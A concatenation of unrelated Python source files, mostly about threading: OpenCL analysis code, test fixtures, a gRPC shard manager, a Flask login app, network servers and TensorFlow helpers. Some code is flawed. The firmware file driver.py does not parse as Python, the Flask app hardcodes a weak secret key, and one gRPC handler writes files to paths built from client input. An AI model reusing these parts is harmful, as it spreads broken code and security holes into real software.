vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
vertical_carryover_buffer,
self.vertical_length_carryover[vertical_carryover_start:vertical_carryover_end],
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
white_vertical_frequency_distribution_buffer,
white_vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
white_vertical_carryover_buffer,
self.white_vertical_length_carryover[white_vertical_carryover_start:white_vertical_carryover_end],
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
diagonal_frequency_distribution_buffer,
diagonal_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
diagonal_carryover_buffer,
self.diagonal_length_carryover[diagonal_carryover_start:diagonal_carryover_end],
device_offset=0,
wait_for=None,
is_blocking=False))
command_queue.finish()
# Update frequency distributions
self.threads_vertical_frequency_distribution[device] += vertical_frequency_distribution
self.threads_white_vertical_frequency_distribution[device] += white_vertical_frequency_distribution
self.threads_diagonal_frequency_distribution[device] += diagonal_frequency_distribution
# Get events runtimes
runtimes = Runtimes()
runtimes.transfer_to_device = self.opencl.convert_events_runtime(transfer_to_device_events)
runtimes.transfer_from_device = self.opencl.convert_events_runtime(transfer_from_device_events)
runtimes.create_matrix = self.opencl.convert_events_runtime(create_matrix_events)
runtimes.detect_vertical_lines = self.opencl.convert_events_runtime(vertical_events)
runtimes.detect_diagonal_lines = self.opencl.convert_events_runtime(diagonal_events)
self.threads_runtimes[device] += runtimes
except Queue.Empty:
break
def run_single_device(self):
for sub_matrix_queue in self.sub_matrix_queues:
self.process_sub_matrix(device=self.opencl.devices[0],
sub_matrix_queue=sub_matrix_queue)
def run_multiple_devices(self):
for sub_matrix_queue in self.sub_matrix_queues:
threads = []
for device in self.opencl.devices:
kwargs = {'device': device,
'sub_matrix_queue': sub_matrix_queue}
thread = threading.Thread(group=None, target=self.process_sub_matrix, name=None, args=(), kwargs=kwargs)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def run(self):
self.reset()
runtimes = Runtimes()
if len(self.opencl.devices) == 0:
print 'No device specified!'
return 0
elif len(self.opencl.devices) == 1:
self.run_single_device()
elif len(self.opencl.devices) > 1:
self.run_multiple_devices()
self.post_process_length_carryovers()
for device in self.opencl.devices:
runtimes += self.threads_runtimes[device]
self.diagonal_frequency_distribution += self.threads_diagonal_frequency_distribution[device]
self.vertical_frequency_distribution += self.threads_vertical_frequency_distribution[device]
self.white_vertical_frequency_distribution += self.threads_white_vertical_frequency_distribution[device]
if self.settings.is_matrix_symmetric:
self.extent_diagonal_frequency_distribution()
result = RQAResult(self.settings,
runtimes,
recurrence_points=self.recurrence_points,
diagonal_frequency_distribution=self.diagonal_frequency_distribution,
vertical_frequency_distribution=self.vertical_frequency_distribution,
white_vertical_frequency_distribution=self.white_vertical_frequency_distribution)
return result
|
test_uvicorn_int.py
|
import os
from multiprocessing import Process
from time import sleep
from urllib.parse import urljoin
import pytest
import requests
import uvicorn
from server import app
class ClientSession(requests.Session):
def __init__(self, base_url):
self.base_url = base_url
super().__init__()
def request(self, method, url, *args, **kwargs):
return super().request(method, urljoin(self.base_url, url), *args, **kwargs)
def get_sleep_time():
# when starting a server process,
# a longer sleep time is necessary on Windows
if os.name == "nt":
return 1.5
return 0.5
server_host = "127.0.0.1"
server_port = 44555
@pytest.fixture(scope="session")
def client_session():
return ClientSession(f"http://{server_host}:{server_port}")
def _start_server():
uvicorn.run(app, host=server_host, port=server_port, log_level="debug")
@pytest.fixture(scope="session", autouse=True)
def server():
server_process = Process(target=_start_server)
server_process.start()
sleep(get_sleep_time())
if not server_process.is_alive():
raise TypeError("The server process did not start!")
yield 1
sleep(1.2)
server_process.terminate()
@pytest.mark.asyncio
async def test_get(client_session):
response = client_session.get("/api/todos/1")
assert response.status_code == 200
|
manager_server.py
|
import os
from datetime import datetime, timedelta
from concurrent.futures import ThreadPoolExecutor
import threading
import time
from lib.config import logger, domain_name
from lib.hoar_frost import HoarFrostGenerator
import grpc
import lib.ipc.manager_pb2_grpc as manager_grpc
import lib.ipc.manager_pb2 as message
from lib.ipc.grpc_client import grpc_options
class Manager(manager_grpc.ManagerServicer):
"""
Implements a server for the Manager gRPC protocol.
"""
def __init__(self, total_shards):
"""
Instantiates a new manager server that handles some
number of shards.
"""
logger.info(f"Number of shards: {total_shards}")
self.hoarfrost_gen = HoarFrostGenerator()
self.total_shards = total_shards
self.registered = [False for _ in range(total_shards)]
self.last_checkin = dict()
self.store = dict()
def health_check(self):
while True:
time.sleep(5)
for shard, last_checkin in self.last_checkin.items():
if last_checkin is not None and last_checkin < datetime.now() - timedelta(seconds=5):
logger.error(f"--- SHARD {shard} MISSED ITS HEARTBEAT, DEREGISTERING... ---")
self.registered[shard] = False
self.last_checkin[shard] = None
def register(self, request, context):
"""Returns the next shard id that needs to be filled as well as the total shards"""
if all(self.registered):
raise Exception("Shard trying to register even though we're full")
i = next(i for i in range(self.total_shards) if not self.registered[i])
logger.info(f"Shard requested id, assigning {i + 1}/{self.total_shards}...")
self.registered[i] = True
return message.ShardInfo(shard_id=i, shard_count=self.total_shards)
def guild_count(self, request, context):
"""Return guild and user count information"""
gc = 0
uc = 0
for guilds in self.store.values():
gc += len(guilds)
for guild in guilds:
uc += guild.member_count
return message.GuildInfo(guild_count=gc, user_count=uc)
def checkin(self, request, context):
self.last_checkin[request.shard_id] = datetime.now()
self.registered[request.shard_id] = True
return message.CheckInResponse()
def publish_file(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
first = next(request_iterator)
filetype = "png" if first.filetype == "" else first.filetype
name = first.name
if name == "":
name = str(self.hoarfrost_gen.generate())
location = first.location
if location == "":
location = "assets"
directory = f"/var/www/{location}"
if not os.path.exists(directory):
os.makedirs(directory)
with open(f"{directory}/{name}.{filetype}", "wb") as f:
logger.info(f"Writing {directory}/{name}.{filetype}")
f.write(first.file)
for datum in request_iterator:
f.write(datum.file)
return message.Url(url=f"https://cdn.{domain_name}/{location}/{name}.{filetype}")
def all_guilds(self, request, context):
"""Return information about all guilds that the bot is in, including their admins"""
for guilds in self.store.values():
for guild in guilds:
yield guild
def guild_update(self, request_iterator, context):
"""Update the manager with the latest information about a shard's guilds"""
guilds = []
for guild in request_iterator:
guilds.append(guild)
if len(guilds) == 0:
return message.UpdateResponse()
logger.debug(f"Received guild list from shard {guilds[0].shard_id + 1} of {len(guilds)} guilds")
self.store[guilds[0].shard_id] = guilds
return message.UpdateResponse()
def serve(manager):
server = grpc.server(ThreadPoolExecutor(max_workers=20), options=grpc_options)
manager_grpc.add_ManagerServicer_to_server(manager, server)
server.add_insecure_port("0.0.0.0:50051")
server.start()
logger.debug("gRPC server started")
server.wait_for_termination()
if __name__ == "__main__":
manager = Manager(int(os.environ["NUM_SHARDS"]))
health = threading.Thread(target=manager.health_check, daemon=True)
health.start()
serve(manager)
|
driver.py
|
# Firmware for hall-sensor based filament diameter sensors.
# Reads analog value from the sensor and provides a mapped and filtered diameter
# reading over I2C (optional analog output)
# Runs on Raspberry Pi Pico ($4)
# Licensed CC-0 / Public Domain by John Moser
#
# Threads and power usage:
# - Main loop: block on i2c
# - LED: sleep_ms() or block on q.get()
# - sensor: sleep_us(1); might be able to reduce this to event-driven
from machine import Pin, ADC, I2C
from utime import sleep_ms, sleep_us
from os import size
from numpy.polynomial.polynomial import Polynomial
from numpy import mean
from queue import Queue
from threading import Thread
#import _thread
# LED states
LED_START = 1
LED_THINKING = 2
LED_COMPLETE = 3
LED_FAULT = 4
def main():
sensor_queue = Queue()
reading_queue = Queue()
reading_response = Queue()
(i2c,led,led_queue,hall_sensor,calibration_table,curve) = init()
t_sensor = Thread(target = sensor_task,
args = (hall_sensor, reading_queue, reading_response))
while True:
pass
# TODO:
# - block and wait for i2c command (i2c.recv(???))
# - when i2c requests diameter:
# reading_queue.put(1)
# i2c.send(get_diameter(reading_response.get(), curve))
#
# - when i2c signals calibrate <diameter>,
# take a reading into the calibration table
def init():
u"""Initialize the board to a known state."""
calibration_path = "/diameter-calibration-table.json"
# Onboard LED, for feedback
led = machine.Pin(25, machine.Pin.OUT)
led_queue = Queue()
t_led = Thread(target = led_task, args = (led, led_queue))
# Signal bootup
led_queue.put(LED_START)
led_queue.put(LED_THINKING)
# I2C0 using pins 0 and 1. Address is 43
# FIXME: Make address configurable
i2c = machine.I2C(0, sda=machine.Pin(0), scl=machine.Pin(1), freq=400000)
i2c.init(I2C.SLAVE, addr=43)
# ADC 0 on GP27, adjacent to AGND
hall_sensor = machine.ADC(27)
# Load calibration table
calibration_table = load_calibration_table(calibration_path)
curve = get_calibration_polynomial(calibration_table)
led_queue.put(LED_COMPLETE)
# send all the initialized stuff back
return (i2c, led, led_queue, hall_sensor, calibration_table, curve)
def led_task(led, q):
u"""a"""
counter = 0
while True:
# Certain actions loop until interrupted
if c in [LED_THINKING, LED_COMPLETE, LED_FAULT]:
if !q.empty(): c = q.get()
else:
c = q.get()
if c == LED_START:
# Definitely set the state to on, then off
led.on()
utime.sleep_ms(1000)
led.off()
elif c == LED_THINKING:
led.toggle()
utime.sleep_ms(500)
elif c == LED_COMPLETE:
# Toggle every 1/8 seconds for 1 second
counter = counter == 0 ? 8 : counter - 1
led.toggle()
utime.sleep_ms(125)
if counter == 0:
led.off()
c = 0 # Clear c
elif c == LED_FAULT:
led.toggle()
utime.sleep_ms(1000)
def sensor_task(hall_sensor, q, qo):
ma_length = 50 # Number of elements in moving average
readings = []
# Repeatedly take readings for a simple moving average
# XXX: Does a 50µs delay matter? If not, block on q.get(),
# and then set a counter and loop to get the 50 readings.
# This reduces power usage.
while True:
readings.append(hall_sensor.read_u16())
if readings.len() > ma_length: readings.pop(0)
sleep_us(1)
# If there's anything in q, send a reading to qo
try:
q.get(block=False)
qo.put(mean(readings))
except:
pass
# The strength of a magnetic field is inversely proportional to the square of the
# distance between the sensor and the magnet:
#
# f(d) = ad**2 + bx + c
#
# Smaller d values (i.e. x values) lead to larger f(d) values; thus the values of d
# greater than zero, left of the vertex, and with f(d) >= 0 is the domain.
#
# The calibration output is the polynomial, and it is solved for x (diameter) given a
# value of y (Hall Sensor reading).
def get_diameter(reading, curve):
u"""Retrieve the diameter reading from the Hall Sensor."""
# Subtract the reading from the polynomial, then find the roots.
# The smallest root is the diameter.
curve.coef[2] -= reading
return min(curve.roots())
###############
# Calibration #
###############
# Calibration works as follows:
#
# - A json file contains { 'calibrate': [ {'reading': HALL_READING, 'diameter': IN_MM}, ... ]}
# - Calibration is read in from this file
# - A certain M-code on the host (M407 D<width>) triggers a sample reading, which
# adds the Hall reading and the diameter to the 'calibrate' key
# - A certain M-code (M407 D<width> S<reading>) provides a diameter and reading
# - Upon loading or updating the calibration info, a quadratic polynomial is fit to the
# data
def calibrate(sensor, sample_diameter):
u"""Adds a sample diameter to the calibration table."""
# Unnecessary? Migrate into a bigger function?
return {'reading': sensor.read_u16(), 'diameter': sample_diameter}
def get_calibration_polynomial(calibration_table):
u"""From calibration points, computes a best-fit quadratic equation."""
return Polynomial.fit(
[x['reading'] for x in calibration_table['calibration']],
[y['diameter'] for y in calibration_table['calibration']],
2)
#
# Because the Hall Effect sensor reading decreases with greater distance,
# the smaller value of regression.roots() is the maximum distance sensed,
# and all values sought are X being less than this.
#
# However, if the sensor never reads 0, then it will be everything to the
# left of the vertex. This is likely the better approach; it's just
# setting the upper bound for diameter.
def load_calibration_table(path)
u"""Open a calibration table from a file."""
try:
# Don't load if the file is like, way big d00d
if (os.size(path) > 5120) raise ImportError
with open(path, 'r') as f:
table = ujson.load(f)
except:
table = {}
return Table
if __name__ == "__main__":
main()
|
test_gpsdclient.py
|
import socket
import threading
import time
from collections import Counter
from gpsdclient import GPSDClient
from .gpsd_fake import GPSD_OUTPUT, VERSION_HEADER, fake_gpsd_server
socket.setdefaulttimeout(10)
def start_fake_server():
server = threading.Thread(target=fake_gpsd_server)
server.start()
time.sleep(1.0)
while not server.is_alive():
time.sleep(0.1)
def test_json_stream():
expected = (VERSION_HEADER.decode("utf-8") + GPSD_OUTPUT).replace("\n\n", "\n")
start_fake_server()
client = GPSDClient()
output = ""
for row in client.json_stream():
output += row + "\n"
assert output == expected
def test_dict_stream():
start_fake_server()
client = GPSDClient()
count = 0
for row in client.dict_stream():
if row["class"] == "TPV":
count += 1
assert count == 3
def test_dict_filter():
start_fake_server()
client = GPSDClient()
counter = Counter()
for row in client.dict_stream(filter=["SKY"]):
counter[row["class"]] += 1
assert counter["TPV"] == 0
assert counter["SKY"] == 3
start_fake_server()
client = GPSDClient()
counter = Counter()
for row in client.dict_stream(filter=["SKY", "TPV"]):
counter[row["class"]] += 1
assert counter["TPV"] == 3
assert counter["SKY"] == 3
|
app.py
|
from flask import Flask, render_template, request, redirect, url_for, flash
##########################
#### importing flask extensions ####
##########################
from flask_login import LoginManager, login_user, current_user, login_required, logout_user
from flask_mail import Mail, Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
from sqlalchemy.ext.hybrid import hybrid_method, hybrid_property
from flask_bcrypt import Bcrypt
from datetime import datetime
from forms import RegisterForm, LoginForm
#create the object of Flask
app = Flask(__name__)
##########################
#### flask app configurations ####
##########################
app.config['SECRET_KEY'] = 'hardsecretkey'
#SqlAlchemy Database Configuration With Mysql
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:''@localhost/flasklogin'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
#Email related Configuration values
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'youraccount@gmail.com'
app.config['MAIL_PASSWORD'] = '@yourgmailpassword'
app.config['MAIL_DEFAULT_SENDER'] = 'youraccount@gmail.com'
##########################
#### initialising flask extensions ####
##########################
db = SQLAlchemy(app)
mail = Mail(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
##########################
#### defining user model and its helper functions using sqlalchemy ####
##########################
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
_password = db.Column(db.String(60), nullable=False)
authenticated = db.Column(db.Boolean, default=False)
email_confirmation_sent_on = db.Column(db.DateTime, nullable=True)
email_confirmed = db.Column(db.Boolean, nullable=True, default=False)
email_confirmed_on = db.Column(db.DateTime, nullable=True)
def __init__(self, email,username, plaintext_password, email_confirmation_sent_on=None):
self.email = email
self.username = username
self._password = plaintext_password
self.authenticated = False
self.email_confirmation_sent_on = email_confirmation_sent_on
self.email_confirmed = False
self.email_confirmed_on = None
@hybrid_property
def password(self):
return self._password
@hybrid_method
def verify_original_pass(self, plaintext_password):
return bcrypt.check_password_hash(self._password, plaintext_password)
@property
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.authenticated
@property
def is_active(self):
"""Always True, as all users are active."""
return True
# @property
# def is_anonymous(self):
# """Always False, as anonymous users aren't supported."""
# return False
def get_id(self):
"""Return the email address to satisfy Flask-Login's requirements."""
"""Requires use of Python 3"""
return str(self.id)
##########################
####mail sending,confirmation and password hashing helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'email_confirmation.html',
confirm_url=confirm_url)
send_email('Confirm Your Email Address', [user_email], html)
@login_manager.user_loader
def load_user(user_id):
return User.query.filter(User.id == int(user_id)).first()
################
#### routes ####
################
@app.route('/')
def home():
form = LoginForm(request.form)
return render_template('login.html', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
email = form.email.data
username = form.username.data
password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
new_user = User(email, username, password)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
send_confirmation_email(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect(url_for('login'))
except IntegrityError:
db.session.rollback()
flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user.email_confirmed==0:
flash('Your acount is not activated! Please open your email inbox and click activation link we sent to activate it', 'info')
elif user is not None and user.verify_original_pass(form.password.data):
user.authenticated = True
db.session.add(user)
db.session.commit()
login_user(user)
flash('You are logged in now, {}'.format(current_user.username))
return redirect(url_for('blog'))
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
# email confirmation and activationm route functions
@app.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=86400)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect(url_for('blog'))
@app.route('/blog')
@login_required
def blog():
return render_template('blog.html')
@app.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
flash('You are logged out,we hope you come back soon!', 'info')
return redirect(url_for('login'))
#run flask app
if __name__ == "__main__":
app.run(debug=True)
|
mod.py
|
#!/usr/bin/env python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import queue
import sys
import threading
# For json-encoded lines of text sent to the mod
QUEUE = queue.Queue()
CACHE = {"line": "no game data yet"}
def log(message):
f = open(os.path.expanduser("~/mod.log"), "a+")
f.write(message + "\n")
f.close()
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers["Content-Length"])
command = self.rfile.read(content_length).decode().strip()
# Clear the queue
while not QUEUE.empty():
try:
QUEUE.get_nowait()
except:
pass
# log("command: " + command)
print(command, flush=True)
try:
line = QUEUE.get(block=True, timeout=10.0)
except:
line = json.dumps({"error": "mod saw no response from game"})
# log("responding with: " + line)
self.send_response(200)
self.end_headers()
self.wfile.write(line.encode())
def server():
port = 7777
httpd = HTTPServer(("", port), Handler)
httpd.serve_forever()
def game_communicator():
log("ready")
print("ready", flush=True)
for line in sys.stdin:
QUEUE.put(line)
CACHE["line"] = line
if __name__ == "__main__":
t1 = threading.Thread(target=server)
t1.start()
t2 = threading.Thread(target=game_communicator)
t2.start()
# We should exit when the game exits. The server thread never exits on its own
t2.join()
|
server.py
|
"""
This file takes part of the server side of the peer to peer network
This file deals with uploading of the song for other peers
"""
from server_client.constants import *
class Server:
def __init__(self,msg):
try:
# the message to upload in bytes
self.msg = msg
# set up the socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# connections
self.connections = []
# make a list of peers
self.peers = []
# bind the socket
self.s.bind((HOST, PORT))
# server is listening for any connections
self.s.listen(1)
print("=" * 10 + "Server Running"+ "=" *10)
self.run()
except Exception as e:
sys.exit()
"""
This method deals with sending info to the clients
This methods also closes the connection if the client has left
:param: connection -> The connection server is connected to
:param: a -> (ip address, port) of the system connected
"""
def handler(self, connection, a):
try:
while True:
# server recieves the message
data = connection.recv(BYTE_SIZE)
for connection in self.connections:
# The peer that is connected wants to disconnect
if data and data.decode('utf-8')[0].lower() == 'q':
# disconnect the peer
self.disconnect(connection, a)
return
elif data and data.decode('utf-8') == REQUEST_STRING:
print("-" * 21 + " UPLOADING " + "-" * 21)
# if the connection is still active we send it back the data
# this part deals with uploading of the file
connection.send(self.msg)
#convert_to_music(self.msg)
except Exception as e:
sys.exit()
"""
This method is run when the user disconencts
"""
def disconnect(self, connection, a):
self.connections.remove(connection)
self.peers.remove(a)
connection.close()
self.send_peers()
print("{}, disconnected".format(a))
print("-" * 50)
"""
This method is use to run the server
This method creates a different thread for each client
"""
def run(self):
# This will make the server constantly look for any new connections
while True:
# listens
connection, a = self.s.accept()
# append to the list of peers
self.peers.append(a)
print("Peers are: {}".format(self.peers) )
self.send_peers()
# this will create a thread for a connection
c_thread = threading.Thread(target=self.handler, args=(connection, a))
c_thread.daemon = True
c_thread.start()
self.connections.append(connection)
print("{}, connected".format(a))
print("-" * 50)
"""
send a list of peers to all the peers that are connected to the server
"""
def send_peers(self):
peer_list = ""
for peer in self.peers:
peer_list = peer_list + str(peer[0]) + ","
for connection in self.connections:
# we add a byte '\x11' at the begning of the our byte
# This way we can differentiate if we recieved a message or a a list of peers
data = PEER_BYTE_DIFFERENTIATOR + bytes(peer_list, 'utf-8')
connection.send(PEER_BYTE_DIFFERENTIATOR + bytes(peer_list, 'utf-8'))
|
tcp_client.py
|
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import asyncore
import errno
import socket
from threading import Thread
from x2py.util.trace import Trace
from x2py.links.client_link import ClientLink
from x2py.links.asyncore.tcp_session import TcpSession
class TcpClient(ClientLink):
"""TCP/IP client link based on the asyncore module."""
class Dispatcher(asyncore.dispatcher):
def __init__(self, owner):
asyncore.dispatcher.__init__(self, map=owner.map)
self.owner = owner
def handle_connect(self):
self.owner.handle_connect()
def handle_close(self):
self.owner.handle_close()
def handle_error(self):
self.owner.handle_error()
def __init__(self, name):
super(TcpClient, self).__init__(name)
self.map = {}
self.dispatcher = TcpClient.Dispatcher(self)
self.thread = Thread(target=self._loop)
self.session = None
self.remote_host = ''
self.remote_port = 0
self.connecting = False
def cleanup(self):
asyncore.close_all(map=self.map)
self.thread.join()
super(TcpClient, self).cleanup()
def connect(self, host, port):
self.connecting = True
self.remote_host = host
self.remote_port = port
Trace.info("connecting to {}:{}", host, port)
self.dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.dispatcher.connect((host, port))
self.thread.start()
def handle_connect(self):
self.sesison = TcpSession(self, self.dispatcher.socket)
self.sesison.connection_made()
def handle_close(self):
self.handle_error()
self.dispatcher.close()
def handle_error(self):
err = self.dispatcher.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if self.connecting:
Trace.error("connect error {}", errno.errorcode[err])
self.connecting = False
return
Trace.error("error {}", errno.errorcode[err])
def _loop(self):
asyncore.loop(map=self.map)
def _on_connect(self, result, context):
super(TcpClient, self)._on_connect(result, context)
if result:
peername = context.socket.getpeername()
Trace.info("connected to {}:{}", peername[0], peername[1])
context.peername = peername
else:
Trace.error("error connecting to {}:{}", self.remote_host, self.remote_port)
def _on_disconnect(self, handle, context):
super(TcpClient, self)._on_disconnect(handle, context)
peername = context.peername
Trace.info("disconnected from {}:{}", peername[0], peername[1])
|
conftest.py
|
import asyncio
import logging
import os
import pprint
from subprocess import PIPE, run
from threading import Thread
import pytest
from pygls import features
from pygls.server import LanguageServer
from cmake_language_server.server import CMakeLanguageServer
@pytest.fixture()
def cmake_build(shared_datadir):
source = shared_datadir / "cmake"
build = source / "build"
build.mkdir()
p = run(
["cmake", str(source)],
cwd=build,
stdout=PIPE,
stderr=PIPE,
universal_newlines=True,
)
if p.returncode != 0:
logging.error("env:\n" + pprint.pformat(os.environ))
logging.error("stdout:\n" + p.stdout)
logging.error("stderr:\n" + p.stderr)
raise RuntimeError("CMake failed")
yield build
@pytest.fixture()
def client_server():
c2s_r, c2s_w = os.pipe()
s2c_r, s2c_w = os.pipe()
def start(ls: LanguageServer, fdr, fdw):
# TODO: better patch is needed
# disable `close()` to avoid error messages
close = ls.loop.close
ls.loop.close = lambda: None
ls.start_io(os.fdopen(fdr, "rb"), os.fdopen(fdw, "wb"))
ls.loop.close = close
server = CMakeLanguageServer(asyncio.new_event_loop())
server_thread = Thread(target=start, args=(server, c2s_r, s2c_w))
server_thread.start()
client = LanguageServer(asyncio.new_event_loop())
client_thread = Thread(target=start, args=(client, s2c_r, c2s_w))
client_thread.start()
yield client, server
client.send_notification(features.EXIT)
server.send_notification(features.EXIT)
server_thread.join()
client_thread.join()
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
updates: [tf.Operation] or tf.Operation
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
